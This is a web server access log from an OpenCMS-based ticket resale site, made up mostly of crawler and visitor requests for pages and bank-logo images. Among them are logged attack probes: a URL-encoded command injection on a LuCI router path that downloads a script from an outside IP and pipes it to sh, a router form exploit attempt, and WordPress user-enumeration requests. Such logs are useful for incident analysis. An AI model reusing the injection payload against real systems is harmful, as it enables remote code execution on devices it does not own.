47.128.50.156 - - [29/Jun/2024:02:15:13 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.50.156 - - [29/Jun/2024:02:15:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.50.156 - - [29/Jun/2024:02:15:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.50.156 - - [29/Jun/2024:02:15:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.50.156 - - [29/Jun/2024:02:15:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.50.156 - - [29/Jun/2024:02:15:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
66.249.76.160 - - [29/Jun/2024:02:15:24 +0200] "GET /ticket2/opencms/sv/sport/baseballbiljetter/ HTTP/1.1" 200 73012
66.249.75.161 - - [29/Jun/2024:02:15:25 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=B7C31852-4938-05B8-A23C-0248E7A3D5BA HTTP/1.1" 200 107640
47.128.124.6 - - [29/Jun/2024:02:15:33 +0200] "GET /ticket2/opencms/es/buy/?catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83497
47.128.124.6 - - [29/Jun/2024:02:15:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.124.6 - - [29/Jun/2024:02:15:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.124.6 - - [29/Jun/2024:02:15:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.124.6 - - [29/Jun/2024:02:15:35 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.124.6 - - [29/Jun/2024:02:15:35 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.124.6 - - [29/Jun/2024:02:15:35 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.124.6 - - [29/Jun/2024:02:15:35 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
52.167.144.184 - - [29/Jun/2024:02:15:36 +0200] "GET /ticket2/opencms/en/venue/?venueid=E42DAA3B-8D14-C1C2-324E-BD1238E886E9 HTTP/1.1" 200 71336
45.128.232.200 - - [29/Jun/2024:02:15:49 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 -
216.245.221.83 - - [29/Jun/2024:02:15:56 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
216.245.221.83 - - [29/Jun/2024:02:15:59 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
185.157.223.150 - - [29/Jun/2024:02:16:00 +0200] "GET /ticket2/tickets_export/outgoing/export.txt HTTP/1.1" 200 24556651
85.208.96.205 - - [29/Jun/2024:02:16:11 +0200] "GET /ticket2/opencms/nl/sport/voetbal-tickets/la_liga/celta_vigo/ HTTP/1.1" 200 72717
51.222.253.9 - - [29/Jun/2024:02:16:16 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
51.222.253.9 - - [29/Jun/2024:02:16:17 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=7DE3A616-7929-2B29-C0D3-F6A6BF870955 HTTP/1.1" 200 85958
20.125.47.94 - - [29/Jun/2024:02:16:28 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.47.178 - - [29/Jun/2024:02:16:30 +0200] "GET /ticket2/opencms/nl/buy/?catid=AD8E612F-0F0B-03C9-5236-E4F8B6523945&comcatid=0A6B8208-FDA4-E929-9D72-5312FD481B76 HTTP/1.1" 200 74903
47.128.47.178 - - [29/Jun/2024:02:16:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.47.178 - - [29/Jun/2024:02:16:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.47.178 - - [29/Jun/2024:02:16:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.47.178 - - [29/Jun/2024:02:16:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.47.178 - - [29/Jun/2024:02:16:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.47.178 - - [29/Jun/2024:02:16:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.47.178 - - [29/Jun/2024:02:16:32 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
185.191.171.7 - - [29/Jun/2024:02:16:36 +0200] "GET /ticket2/opencms/en/login/?url=%25252Fen%25252Fsell%25252F HTTP/1.1" 200 73431
40.77.167.121 - - [29/Jun/2024:02:16:42 +0200] "GET /ticket2/opencms/fi/buy?page=1&edid=100B7BEC-24E7-7E43-4295-F9FDC77048A6 HTTP/1.1" 200 88546
51.222.253.9 - - [29/Jun/2024:02:17:24 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=7CAFAFC0-24E6-FEED-327F-0B9B876C4B81 HTTP/1.1" 200 87554
47.128.124.45 - - [29/Jun/2024:02:17:25 +0200] "GET /ticket2/opencms/fi/buy/?eventid=C7B8839D-D05D-58E7-D08F-88E8ADCFDD77&page=11 HTTP/1.1" 200 74780
47.128.124.45 - - [29/Jun/2024:02:17:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.124.45 - - [29/Jun/2024:02:17:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.124.45 - - [29/Jun/2024:02:17:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.124.45 - - [29/Jun/2024:02:17:27 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.124.45 - - [29/Jun/2024:02:17:27 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.124.45 - - [29/Jun/2024:02:17:27 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.124.45 - - [29/Jun/2024:02:17:27 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
66.249.75.106 - - [29/Jun/2024:02:17:27 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=CCC52869-7D07-37D3-E716-0EF1AC21BCE4 HTTP/1.1" 200 110344
47.128.51.177 - - [29/Jun/2024:02:17:29 +0200] "GET /ticket2/opencms/dk/buy/?edid=87DA8067-258E-93BF-F8B0-6A2011EF3D80 HTTP/1.1" 200 72066
47.128.51.177 - - [29/Jun/2024:02:17:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.51.177 - - [29/Jun/2024:02:17:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.51.177 - - [29/Jun/2024:02:17:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.51.177 - - [29/Jun/2024:02:17:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.51.177 - - [29/Jun/2024:02:17:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.51.177 - - [29/Jun/2024:02:17:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.51.177 - - [29/Jun/2024:02:17:31 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
216.245.221.83 - - [29/Jun/2024:02:17:39 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
216.245.221.83 - - [29/Jun/2024:02:17:39 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
52.167.144.22 - - [29/Jun/2024:02:17:40 +0200] "GET /ticket2/opencms/dk/login/?url=/dk/sell/ HTTP/1.1" 200 73975
167.94.138.60 - - [29/Jun/2024:02:17:44 +0200] "GET / HTTP/1.1" 404 -
167.94.138.60 - - [29/Jun/2024:02:17:58 +0200] "GET / HTTP/1.1" 404 -
167.94.138.60 - - [29/Jun/2024:02:18:00 +0200] "PRI * HTTP/2.0" 505 -
185.191.171.12 - - [29/Jun/2024:02:18:00 +0200] "GET /ticket2/opencms/en/sport/football-tickets/premier_league/aston_villa/ HTTP/1.1" 200 84701
185.191.127.212 - - [29/Jun/2024:02:18:12 +0200] "GET /ticket2/opencms/de/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%253E%2560wget+http%253A%252F%252F103.149.28.141%252Ft+-O-+%7c+sh%2560) HTTP/1.1" 404 -
185.157.223.150 - - [29/Jun/2024:02:18:20 +0200] "GET /ticket2/tickets_export/outgoing/export.txt HTTP/1.1" 200 24556651
47.128.21.217 - - [29/Jun/2024:02:18:22 +0200] "GET /ticket2/opencms/fi/venue/?venueid=1E6F661B-8D12-844B-5F2D-01422A9038BD HTTP/1.1" 200 72950
47.128.21.217 - - [29/Jun/2024:02:18:23 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.21.217 - - [29/Jun/2024:02:18:23 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.21.217 - - [29/Jun/2024:02:18:23 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.21.217 - - [29/Jun/2024:02:18:24 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.21.217 - - [29/Jun/2024:02:18:24 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.21.217 - - [29/Jun/2024:02:18:24 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.21.217 - - [29/Jun/2024:02:18:24 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
66.249.76.2 - - [29/Jun/2024:02:18:29 +0200] "GET /ticket2/opencms/fi/venue/?venueid=66B80C8D-02F9-D9AE-4568-9AC2DE8502C2 HTTP/1.1" 200 72968
66.249.75.167 - - [29/Jun/2024:02:18:29 +0200] "GET /ticket2/opencms/nl/buy/?page=1&edid=F2D85B77-0146-9383-AAB8-AFEF60C3B51B HTTP/1.1" 200 109683
66.249.75.162 - - [29/Jun/2024:02:18:31 +0200] "GET /ticket2/opencms/dk/venue/?countryid=DBAF1CDD-BB02-B386-3F1A-E606C2F733BC HTTP/1.1" 200 102953
51.222.253.5 - - [29/Jun/2024:02:18:32 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=713C8E2E-8856-812A-FD61-94B2B631F7A2 HTTP/1.1" 200 85963
66.249.72.35 - - [29/Jun/2024:02:18:32 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=99C77A16-8AF9-4675-97DE-42A41C4ECB4F HTTP/1.1" 200 116108
185.191.171.5 - - [29/Jun/2024:02:18:34 +0200] "GET /ticket2/opencms/sv/magazine/article?title=chelsea-vs-tottenham-2-0 HTTP/1.1" 200 75440
114.119.137.43 - - [29/Jun/2024:02:18:48 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=6C8DE414-D8B1-16E6-0512-963E8D9D9EFB HTTP/1.1" 200 85166
47.128.123.158 - - [29/Jun/2024:02:19:17 +0200] "GET /ticket2/opencms/fi/venue/?venueid=7E3A2D74-DA88-871F-895E-1180E253F56F HTTP/1.1" 200 72917
47.128.123.158 - - [29/Jun/2024:02:19:18 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.123.158 - - [29/Jun/2024:02:19:18 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.123.158 - - [29/Jun/2024:02:19:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.123.158 - - [29/Jun/2024:02:19:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.123.158 - - [29/Jun/2024:02:19:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.123.158 - - [29/Jun/2024:02:19:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.123.158 - - [29/Jun/2024:02:19:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
85.208.96.194 - - [29/Jun/2024:02:19:22 +0200] "GET /ticket2/opencms/nl/sport/voetbal-tickets/la_liga/athletic-bilbao/ HTTP/1.1" 200 72361
114.119.130.175 - - [29/Jun/2024:02:19:36 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=8FA89923-43E1-C2D4-CF2D-7AD58BCB6B41 HTTP/1.1" 200 86719
51.222.253.7 - - [29/Jun/2024:02:19:39 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=55071255-F1B1-83D4-CE10-06DA54270E48 HTTP/1.1" 200 85962
47.128.120.121 - - [29/Jun/2024:02:19:44 +0200] "GET /ticket2/opencms/fr/buy/?edid=25666712-CB7E-CDDD-4626-F1CD96C38316 HTTP/1.1" 200 72687
47.128.120.121 - - [29/Jun/2024:02:19:45 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.120.121 - - [29/Jun/2024:02:19:46 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.120.121 - - [29/Jun/2024:02:19:46 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.120.121 - - [29/Jun/2024:02:19:46 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.120.121 - - [29/Jun/2024:02:19:46 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.120.121 - - [29/Jun/2024:02:19:46 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.120.121 - - [29/Jun/2024:02:19:46 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
46.48.246.229 - - [29/Jun/2024:02:19:55 +0200] "GET /ticket2/opencms/de/wp-json/?rest_route=/wp/v2/USERS HTTP/1.1" 404 -
85.208.96.194 - - [29/Jun/2024:02:19:55 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
85.208.96.199 - - [29/Jun/2024:02:19:56 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/premier_league/nottingham-forest/ HTTP/1.1" 200 85037
85.173.126.151 - - [29/Jun/2024:02:19:58 +0200] "GET /ticket2/opencms/de/wp-json/?rest_route=/wp/v2/USERS HTTP/1.1" 404 -
47.128.37.164 - - [29/Jun/2024:02:20:13 +0200] "GET /ticket2/opencms/nl/buy/?catid=55D1256D-BDD9-CBA3-47A3-0A252F702555&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 76189
47.128.37.164 - - [29/Jun/2024:02:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.37.164 - - [29/Jun/2024:02:20:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.37.164 - - [29/Jun/2024:02:20:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.37.164 - - [29/Jun/2024:02:20:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.37.164 - - [29/Jun/2024:02:20:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.37.164 - - [29/Jun/2024:02:20:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.37.164 - - [29/Jun/2024:02:20:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
66.249.75.161 - - [29/Jun/2024:02:20:35 +0200] "GET /ticket2/opencms/nl/sport/voetbal-tickets/premier_league/chelsea/ HTTP/1.1" 200 84449
51.222.253.1 - - [29/Jun/2024:02:20:41 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=530D0E9B-9711-6A6E-2177-92B0D667A039 HTTP/1.1" 200 85968
20.125.40.15 - - [29/Jun/2024:02:20:42 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/front_page/sv/elite_prospects.png HTTP/1.1" 200 14543
40.77.167.35 - - [29/Jun/2024:02:20:55 +0200] "GET /ticket2/opencms/dk/sport/fodboldbilletter/premier-league/brighton/ HTTP/1.1" 200 83192
216.245.221.83 - - [29/Jun/2024:02:20:56 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
216.245.221.83 - - [29/Jun/2024:02:20:59 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
40.77.167.121 - - [29/Jun/2024:02:21:04 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/la_liga/zaragoza/ HTTP/1.1" 302 -
40.77.167.121 - - [29/Jun/2024:02:21:06 +0200] "GET /ticket2/opencms/sv/buy/ HTTP/1.1" 200 72402
47.128.123.166 - - [29/Jun/2024:02:21:09 +0200] "GET /ticket2/opencms/it/buy/?catid=573B7747-EE85-D769-C87D-F3F61FB64AA5&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 83424
47.128.123.166 - - [29/Jun/2024:02:21:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.123.166 - - [29/Jun/2024:02:21:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.123.166 - - [29/Jun/2024:02:21:11 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.123.166 - - [29/Jun/2024:02:21:11 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.123.166 - - [29/Jun/2024:02:21:11 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.123.166 - - [29/Jun/2024:02:21:11 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.123.166 - - [29/Jun/2024:02:21:11 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
185.157.223.150 - - [29/Jun/2024:02:21:41 +0200] "GET /ticket2/tickets_export/outgoing/export.txt HTTP/1.1" 200 24556651
162.216.149.25 - - [29/Jun/2024:02:21:47 +0200] "GET /ticket2/opencms/de/ HTTP/1.1" 200 91946
51.222.253.19 - - [29/Jun/2024:02:22:00 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=4E3FD371-418F-2707-0FE4-F6E7006C81F9 HTTP/1.1" 200 85962
85.208.96.193 - - [29/Jun/2024:02:22:01 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/la_liga/eibar/ HTTP/1.1" 200 74109
47.128.120.139 - - [29/Jun/2024:02:22:02 +0200] "GET /ticket2/opencms/fr/buy/?edid=BBDCBF15-1B06-DD9F-49B6-3829D3B56DBC HTTP/1.1" 200 72687
47.128.120.139 - - [29/Jun/2024:02:22:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.120.139 - - [29/Jun/2024:02:22:03 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.120.139 - - [29/Jun/2024:02:22:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.120.139 - - [29/Jun/2024:02:22:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.120.139 - - [29/Jun/2024:02:22:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.120.139 - - [29/Jun/2024:02:22:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.120.139 - - [29/Jun/2024:02:22:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.121.116 - - [29/Jun/2024:02:22:06 +0200] "GET /ticket2/opencms/dk/buy/?catid=2CCC191C-F37F-B9CA-D41C-1204E575B328&comcatid=97ECA65A-72DA-F9AF-9DBB-245D3CFED1BE HTTP/1.1" 200 77205
47.128.121.116 - - [29/Jun/2024:02:22:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.121.116 - - [29/Jun/2024:02:22:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.121.116 - - [29/Jun/2024:02:22:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.121.116 - - [29/Jun/2024:02:22:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.121.116 - - [29/Jun/2024:02:22:08 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.121.116 - - [29/Jun/2024:02:22:08 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.121.116 - - [29/Jun/2024:02:22:08 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
185.191.171.14 - - [29/Jun/2024:02:22:24 +0200] "GET /ticket2/opencms/no/sport/ishockey/nhl/San_Jose_Sharks/ HTTP/1.1" 200 75134
66.249.76.160 - - [29/Jun/2024:02:22:36 +0200] "GET /ticket2/opencms/dk/sport/fodboldbilletter/bundesliga/frankfurt/ HTTP/1.1" 200 73147
216.245.221.83 - - [29/Jun/2024:02:22:39 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
216.245.221.83 - - [29/Jun/2024:02:22:39 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
216.244.66.238 - - [29/Jun/2024:02:22:44 +0200] "GET /ticket2/opencms/dk/en/venue/?countryid=DDBEC1A9-923C-6F8A-904B-EA3F8C6D99F4 HTTP/1.1" 404 -
216.244.66.238 - - [29/Jun/2024:02:22:49 +0200] "GET /ticket2/opencms/fi/search.html?searchQuery=New+Jersey HTTP/1.1" 200 93800
47.128.127.242 - - [29/Jun/2024:02:23:06 +0200] "GET /ticket2/opencms/nl/buy/?catid=FF8D7FE7-4B09-7305-01C7-2D47F7913EB8&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 81250
47.128.127.242 - - [29/Jun/2024:02:23:06 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/jquery.fancybox.css HTTP/1.1" 200 4939
47.128.127.242 - - [29/Jun/2024:02:23:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.127.242 - - [29/Jun/2024:02:23:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.127.242 - - [29/Jun/2024:02:23:07 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.127.242 - - [29/Jun/2024:02:23:08 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.127.242 - - [29/Jun/2024:02:23:08 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
